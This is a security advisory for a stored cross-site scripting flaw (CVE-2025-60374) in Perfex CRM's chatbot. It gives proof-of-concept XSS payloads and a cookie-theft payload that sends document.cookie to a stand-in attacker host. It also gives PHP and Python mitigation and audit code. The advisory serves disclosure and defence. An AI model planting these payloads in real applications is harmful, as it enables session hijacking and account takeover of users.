Perfex CRM Chatbot Cross Site Scripting
The Perfex CRM chatbot contains a stored cross-site scripting (XSS) vulnerability (CVE-2025-60374) that lets an attacker inject malicious code which is stored on the server and executed when other users view the chat messages. The flaw can lead to session hijacking, data leakage and account takeover. Upgrading to version 3.3.1 or later and strengthening input filtering and output encoding is recommended. 2025-10-12 19:56:19 Author: cxsecurity.com


# CVE-2025-60374: Stored Cross-Site Scripting (XSS) in Perfex CRM Chatbot

> **⚠️ Security Advisory**
> A critical Stored Cross-Site Scripting vulnerability in Perfex CRM's chatbot feature

[![CVE](https://img.shields.io/badge/CVE-2025--60374-red)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-60374) [![Severity](https://img.shields.io/badge/Severity-High-orange)]() [![CWE](https://img.shields.io/badge/CWE-79-blue)](https://cwe.mitre.org/data/definitions/79.html)

---

## 📋 Overview

A Stored Cross-Site Scripting (XSS) vulnerability has been discovered in Perfex CRM's chatbot feature. This vulnerability allows attackers to inject malicious HTML and JavaScript code that gets stored on the server and executed in victims' browsers when they view chat messages.

## 🎯 Affected Versions

- **Product:** Perfex CRM
- **Vendor:** Perfex CRM
- **Vulnerable Versions:** < 3.3.1
- **Fixed Version:** 3.3.1+

## 🔍 Vulnerability Details

| Attribute | Value |
|-----------|-------|
| **CVE ID** | CVE-2025-60374 |
| **Type** | Stored Cross-Site Scripting (XSS) |
| **CWE** | [CWE-79](https://cwe.mitre.org/data/definitions/79.html) |
| **Attack Vector** | Network/Remote |
| **Authentication** | Required (Low Privilege) |
| **User Interaction** | None to Minimal |
| **Discoverer** | Ajansha Shankar |

### Description

The chatbot's message parameter in Perfex CRM lacks proper input sanitization and output encoding. When users submit messages through the chatbot interface, malicious HTML/JavaScript payloads are stored in the database without adequate filtering and subsequently rendered without proper escaping, leading to code execution in other users' browsers.

### Root Cause

- ❌ Insufficient input validation on chatbot message parameter
- ❌ Missing output encoding when rendering stored messages
- ❌ Session cookies not marked as `HttpOnly`
- ❌ Lack of Content Security Policy (CSP)

## 💥 Impact

### Security Implications

- **🔓 Session Hijacking:** Attackers can steal session tokens via `document.cookie` access
- **👤 Account Takeover:** Complete compromise of victim accounts
- **🎭 Privilege Escalation:** Administrator account compromise if admin views malicious message
- **📊 Data Exfiltration:** Access to sensitive information in user's browser context
- **🎪 Phishing:** Ability to modify page content and redirect users

### CIA Triad Assessment

| Factor | Impact | Explanation |
|--------|--------|-------------|
| **Confidentiality** | 🔴 HIGH | Session tokens and sensitive data can be stolen |
| **Integrity** | 🔴 HIGH | Unauthorized actions can be performed as the victim |
| **Availability** | 🟡 LOW | Limited impact on system availability |

## 🧪 Proof of Concept

### PoC 1: Basic Image XSS

```html
<img src=x onerror=alert('XSS executed!')>
```

### PoC 2: Interactive Button XSS

```html
<button onclick=alert('Click executed!')>Click here</button>
```

### PoC 3: Auto-playing Embedded Content

```html
<iframe width="560" height="315" src="https://www.youtube.com/embed/6B2jvf81LxE?playlist=Gvq4d460C1M&autoplay=1" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen>
</iframe>
```

### PoC 4: Event-based XSS

```html
<meter value=2 min=0 max=10 onmouseover=alert('XSS triggered!')> 2 out of 10 </meter>
```

### Real-World Attack Scenario

**Cookie Theft Example:**

```html
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">
```

This payload would send the victim's session cookie to an attacker-controlled server, enabling complete account takeover.

## 🛡️ Mitigation

### For End Users

1. **✅ Upgrade Immediately:** Update to Perfex CRM v3.3.1 or later
2. **🔍 Audit Messages:** Review chatbot history for suspicious HTML/JavaScript content
3. **🔄 Reset Sessions:** Force all users to re-authenticate after patching
4. **📝 Monitor Logs:** Check for unusual chatbot activity

### For Developers

#### Immediate Fixes

```php
// Input Sanitization Example
$message = htmlspecialchars($input_message, ENT_QUOTES, 'UTF-8');

// Output Encoding Example
echo htmlspecialchars($stored_message, ENT_QUOTES, 'UTF-8');
```

#### Long-term Security Improvements

1. **Content Security Policy (CSP)**

```http
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';
```

2. **HttpOnly Cookies**

```php
setcookie('session', $value, [
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Strict'
]);
```

3. **Input Validation Library**

```php
// Use an allow-list HTML sanitizer such as HTML Purifier (PHP);
// DOMPurify is the equivalent for client-side rendering in the browser.
$config   = HTMLPurifier_Config::createDefault();
$purifier = new HTMLPurifier($config);
$clean_html = $purifier->purify($dirty_html);
```

## 📚 References

- [CWE-79: Cross-site Scripting (XSS)](https://cwe.mitre.org/data/definitions/79.html)
- [OWASP XSS Prevention Cheat Sheet](https://owasp.org/www-community/attacks/xss/)
- [CVE-2025-60374 Official Entry](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-60374)

## 👤 Credits

**Discovered by:** Ajansha Shankar

## 📧 Contact

For questions or additional information:

- **LinkedIn:** https://www.linkedin.com/in/ajansha-shankar/
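To make the two defensive steps above concrete, the following Python example (added here; it is not code from the advisory or from Perfex CRM) places the vulnerable rendering pattern next to the output-encoded one, and runs the kind of review the "Audit Messages" step asks for over a constructed sample of stored chatbot messages. The message tuples, the regular expressions and the function names are assumptions made for illustration; Python is used instead of PHP so the logic can be checked stand-alone, with `html.escape(..., quote=True)` playing the role of `htmlspecialchars($s, ENT_QUOTES, 'UTF-8')`.

```python
"""Added example (not part of the advisory): output encoding of stored chat
messages, plus an audit pass over stored chatbot history that flags message
bodies carrying HTML or script-bearing attributes. All sample data is constructed."""
import html
import re
from typing import List, Tuple

# Constructed sample of a chatbot message store: (message_id, author, body).
# Entries 2-5 carry the kinds of payload the advisory's PoCs describe; entry 6
# is a benign message that happens to contain '<' and '&'.
SAMPLE_MESSAGES: List[Tuple[int, str, str]] = [
    (1, "alice", "Hi, can you send me the invoice for March?"),
    (2, "mallory", "<img src=x onerror=alert('XSS executed!')>"),
    (3, "mallory", "<button onclick=alert('Click executed!')>Click here</button>"),
    (4, "mallory", "<meter value=2 min=0 max=10 onmouseover=alert('XSS triggered!')> 2 out of 10 </meter>"),
    (5, "mallory", 'check this <a href="javascript:alert(1)">link</a>'),
    (6, "bob", "Price is < 100 EUR & shipping is free"),
]

# Audit patterns (assumed, for illustration): an HTML start tag, an inline
# event-handler attribute, or a javascript:/data: URL. A match marks a message
# for human review; it does not by itself prove exploitation.
_TAG_RE = re.compile(r"<\s*[a-zA-Z][^>]*>")
_EVENT_HANDLER_RE = re.compile(r"\bon[a-zA-Z]+\s*=", re.IGNORECASE)
_SCRIPT_URL_RE = re.compile(r"(javascript|data)\s*:", re.IGNORECASE)

_WRAPPER_OPEN = '<div class="chat-message">'
_WRAPPER_CLOSE = "</div>"


def render_message_unsafe(body: str) -> str:
    """The vulnerable pattern: the stored body is interpolated into the page as-is."""
    return f"{_WRAPPER_OPEN}{body}{_WRAPPER_CLOSE}"


def render_message_safe(body: str) -> str:
    """Hardened output encoding: every <, >, &, " and ' becomes an entity, so the
    browser displays the literal characters instead of interpreting markup."""
    return f"{_WRAPPER_OPEN}{html.escape(body, quote=True)}{_WRAPPER_CLOSE}"


def is_suspicious(body: str) -> bool:
    """True when a stored message body contains markup or script-bearing attributes."""
    return bool(
        _TAG_RE.search(body)
        or _EVENT_HANDLER_RE.search(body)
        or _SCRIPT_URL_RE.search(body)
    )


def audit_messages(messages: List[Tuple[int, str, str]]) -> List[Tuple[int, str]]:
    """Return (message_id, author) for every stored message that needs review."""
    return [(mid, author) for mid, author, body in messages if is_suspicious(body)]


def contains_active_markup(rendered: str) -> bool:
    """Check whether the rendered fragment still carries a tag inside the wrapper,
    i.e. whether the browser would parse user-controlled markup."""
    inner = rendered[len(_WRAPPER_OPEN):-len(_WRAPPER_CLOSE)]
    return bool(_TAG_RE.search(inner))


if __name__ == "__main__":
    for mid, author in audit_messages(SAMPLE_MESSAGES):
        print(f"review message {mid} from {author}")
    payload = SAMPLE_MESSAGES[1][2]
    print("unsafe :", render_message_unsafe(payload))
    print("safe   :", render_message_safe(payload))
```

Run as a script it lists messages 2 to 5 for review and leaves bob's message alone, and it prints the same payload twice: once as live markup, once as inert text. The audit regexes are deliberately broad, since in a chat application a message should carry no markup at all; false positives cost a reviewer a glance, false negatives cost a session.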

Article source: https://cxsecurity.com/issue/WLB-2025100008